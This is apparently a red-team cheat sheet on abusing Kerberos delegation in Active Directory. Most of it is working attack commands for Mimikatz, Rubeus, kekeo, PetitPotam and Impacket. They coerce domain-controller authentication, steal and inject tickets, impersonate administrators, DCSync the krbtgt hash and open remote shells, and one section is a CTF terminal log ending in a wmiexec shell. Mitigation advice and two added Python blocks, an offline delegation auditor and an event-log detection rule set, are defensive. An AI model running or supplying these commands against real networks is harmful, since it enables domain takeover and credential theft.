Trustee and Resource Delegation

Exploiting Delegation

Delegations

ADeleginator

NXC

nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation

https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03

SharpADWS

Unconstrained Delegation

Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain

Discovery

  • PowerView

Get-DomainComputer -UnConstrained

  • AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect, then export the cached tickets:

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse the exported DA TGT

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'

How do you trick a highly privileged user into connecting to a machine with unconstrained delegation? Printer Bug

Misconfiguration: Print Spooler

Capture the TGT of dc$ by running Rubeus on the victim server

Rubeus.exe monitor /interval:5 /nowrap

Printerbug - Run MS-RPRN.exe

MS-RPRN.exe \\dc.domain.local \\victim.domain.local

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

Or with PetitPotam

.\PetitPotam.exe victim-hostname

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

On Linux, use Coercer

Coercion goes over SMB (445, 139) / RPC

ShadowCoerce or DFSCoerce can also be used

Copy the base64-encoded TGT and remove any extra spaces before using it

Rubeus.exe ptt /ticket:<Base64>

Or use Invoke-Mimikatz:

# Decode the base64 ticket printed by Rubeus monitor into a .kirbi file, then inject it
[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",
[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\USDC.kirbi"'

Run DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Mitigation

The following security controls should be implemented to mitigate unconstrained delegation:

  • Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.

  • Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’. This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.

  • Ensure privileged user objects are members of the Protected Users security group. Members of this security group cannot be delegated.

  • Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Constrained Delegation - Protocol Transition

Constrained Delegation: allows the first hop server to request access only to specified computers

The Service for User (S4U) Kerberos extensions are used to impersonate a user:

S4U2self: allows a service to obtain a forwardable TGS to itself on behalf of a user - requires the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION flag (protocol transition)

S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains the list of SPNs to which the ticket can be forwarded

Discovery

  • PowerView

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

  • AD Module

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
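An auditor-side classifier for the attributes the unconstrained and constrained discovery queries above return, checked against the mitigation list (sensitive flag, Protected Users). This is an added example and not code from the original page; the input is a constructed list of dicts shaped like LDAP results, and the Protected Users DN is an assumed value.

```python
# Added example: classify delegation settings from LDAP attributes offline.
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller machine account
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2self for any user)
PROTECTED_USERS = "CN=Protected Users,CN=Users,DC=domain,DC=local"  # assumed domain DN

def classify(obj):
    """Return which delegation type, if any, is configured on one account object."""
    uac = obj.get("userAccountControl", 0)
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if obj.get("msDS-AllowedToDelegateTo"):
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained-protocol-transition"
        return "constrained-kerberos-only"
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        return "rbcd-target"
    return "none"

def audit(objects, privileged):
    """Return (account, finding) pairs for the conditions the mitigation list calls out."""
    findings = []
    for o in objects:
        name, uac, kind = o["sAMAccountName"], o.get("userAccountControl", 0), classify(o)
        if kind == "unconstrained" and not uac & UF_SERVER_TRUST_ACCOUNT:
            findings.append((name, "unconstrained delegation on a non-DC"))
        if kind == "constrained-protocol-transition":
            findings.append((name, "protocol transition: service can S4U2self any user"))
        if name in privileged and not uac & UF_NOT_DELEGATED \
                and PROTECTED_USERS not in o.get("memberOf", []):
            findings.append((name, "privileged account is delegatable"))
    return findings

# Constructed sample objects; UAC mixes the flags above with 0x200 (user) or 0x1000 (workstation).
SAMPLE = [
    {"sAMAccountName": "DC01$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000 | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "appsvc", "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/mssql.domain.local"]},
    {"sAMAccountName": "SQL01$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["ldap/dc01.domain.local"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200},
    {"sAMAccountName": "da.user", "userAccountControl": 0x200, "memberOf": [PROTECTED_USERS]},
]

if __name__ == "__main__":
    for account, finding in audit(SAMPLE, {"Administrator", "da.user"}):
        print(f"{account}: {finding}")
```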

Abusing with kekeo

password or NTLM/AES keys required

  1. Request a TGT

kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>

  2. Request a TGS (an alternate service on the same host can be appended with |)

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL

  3. Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
ls \\mssql.domain.local\c$
Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt
ls \\mssql.domain.local\c$

With rc4

Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:umssql-hostname cmd.exe

Abusing with kekeo (machine account allowed to delegate to the DC)

password or NTLM/AES keys required

  1. Request a TGT

kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>

  2. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL

  3. Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt <tgs_from_step_2>.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Abusing with Rubeus (machine account allowed to delegate to the DC)

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence - msDS-AllowedToDelegateTo


Resource-based Constrained Delegation

Instead of SPNs in msDS-AllowedToDelegateTo on the front-end service, access is controlled by a security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service.

The service administrator can configure this delegation, whereas for the other types the SeEnableDelegation privilege is required (held by default only by DAs).

Two privileges needed to abuse RBCD:

  1. Write permissions over the target service

  2. Control over an object which has an SPN configured (for example admin access to a domain-joined machine, or the ability to join a machine to the domain - ms-DS-MachineAccountQuota is 10 by default)

Write Permission

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}

Exploit

Configure RBCD

$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for computerx$

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key and access victim as ANY user we want

Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt
winrs -r:victim cmd.exe

With Impacket

L.BIANCHI_ADM is a DA

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_ldap.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt
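Detection logic for the telemetry the S4U2proxy steps (kekeo, Rubeus, Impacket getST) and the RBCD configuration step above leave behind. This is an added example, not code from the original page: the events are constructed dicts named after the fields of Windows Security event 4769 (service ticket requested; Transited Services is populated on S4U2proxy) and 5136 (directory object modified, which needs directory service change auditing enabled). The watch list, hostnames and addresses are invented.

```python
# Added example: two detection rules over constructed 4769 / 5136 event records.
DELEGATION_ATTRIBUTES = {"msDS-AllowedToActOnBehalfOfOtherIdentity", "msDS-AllowedToDelegateTo"}
OPERATION = {"%%14674": "added", "%%14675": "deleted"}  # 5136 OperationType codes

def flag_s4u2proxy(event, watch_users):
    """A ticket was obtained on behalf of a watched user by an intermediate service."""
    if event["EventID"] != 4769 or not event.get("TransitedServices"):
        return None
    user = event["TargetUserName"].split("@")[0].lower()
    if user not in {u.lower() for u in watch_users}:
        return None
    return (f"S4U2proxy: {event['TransitedServices']} got {event['ServiceName']} "
            f"as {user} from {event['IpAddress']}")

def flag_delegation_change(event):
    """A delegation attribute was written on a user or computer object."""
    if event["EventID"] != 5136 or event["AttributeLDAPDisplayName"] not in DELEGATION_ATTRIBUTES:
        return None
    op = OPERATION.get(event["OperationType"], event["OperationType"])
    return (f"{event['AttributeLDAPDisplayName']} {op} on {event['ObjectDN']} "
            f"by {event['SubjectUserName']}")

def scan(events, watch_users):
    """Run both rules over a batch of events and return the alert strings in order."""
    alerts = []
    for e in events:
        for alert in (flag_s4u2proxy(e, watch_users), flag_delegation_change(e)):
            if alert:
                alerts.append(alert)
    return alerts

SAMPLE_EVENTS = [  # constructed; mirrors the RBCD walkthrough above
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "cifs/fs01",
     "TransitedServices": "", "IpAddress": "10.0.0.50"},
    {"EventID": 5136, "SubjectUserName": "lowpriv", "ObjectDN": "CN=VICTIM,CN=Computers,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674"},
    {"EventID": 4769, "TargetUserName": "Administrator@DOMAIN.LOCAL", "ServiceName": "http/victim",
     "TransitedServices": "computer1$@DOMAIN.LOCAL", "IpAddress": "10.0.0.50"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS, {"Administrator"}):
        print(line)
```

A normal 4769 carries an empty Transited Services field, so the first sample produces no alert; only the attribute write and the impersonating S4U2proxy request do.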

Constrained Delegation - Kerberos Only

Leverage RBCD to abuse Kerberos Only configuration

Enumeration

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Create a new machine account

https://github.com/Kevin-Robertson/Powermad

. .\Powermad.ps1
New-MachineAccount -MachineAccount studentcompX

Configure RBCD

# On victim host: get a TGT for victim$ so it can write its own msDS-AllowedToActOnBehalfOfOtherIdentity
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /domain:domain.local /ptt /nowrap

# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Get TGS

# Get the RC4 hash of the new machine account's password
Rubeus.exe hash /password:P@ssword@123

Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap

Request a new forwardable TGS

Rubeus.exe s4u /tgs:<base64_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe
